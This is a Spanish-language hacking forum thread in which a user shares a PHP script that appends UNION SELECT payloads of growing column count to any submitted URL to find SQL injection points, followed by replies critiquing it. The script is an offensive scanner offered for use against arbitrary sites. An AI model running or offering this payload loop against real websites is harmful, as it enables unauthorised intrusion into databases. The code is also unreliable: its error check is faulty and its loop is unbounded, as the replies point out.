Luego de hacerlo en Python -> SQLi Searcher Python (http://www.portalhacker.net/index.php/topic,135555.0.html)
Traigo la versión PHP para quienes no tenga Python :P
<form action=? method=post>
URL:<input name=url><br/>
<input type=SUBMIT><br />
<?php
$url=$_REQUEST['url'];
if($url==NULL){exit;}
$temp="-1+union+all+select+";$i=1;
for(;;){
$temp.="$i,";
$injection=substr($temp,0,-1);
$c=file_get_contents("$url$injection");
if(!eregi("The used SELECT",$c) || !eregi("mysql_fetch",$c)){
echo "Injection encontrada <a href=$url$injection>VER !</a><br /><br />";
exit;
}
$i++;
}
?>
Saludos UnderC0de ;)
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.
Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.
Tambien estas utilizando funciones obsoletas como eregi() (http://www.php.net/manual/es/function.eregi.php) y el código se puede optimizar mucho mas.
Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.
Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.
Tambien estas utilizando funciones obsoletas como eregi() (http://www.php.net/manual/es/function.eregi.php) y el código se puede optimizar mucho mas.
Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Thanks you.
Sobre el eregi() lo usé porque otros como stristr y esas madres no me ayudaban mucho :-\
Ya sabía que lidiaba con algo "obsoleto"
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.
Saludos y espero ver el source mejorado.
Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.
Saludos y espero ver el source mejorado.
Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Claro, si te refieres a que está en Python.
No lo hago para que sea mejor, lo hago para que haya diversidad de posibilidades.
PHP es más accesible que Python , pues lo puedes ejecutar desde una web.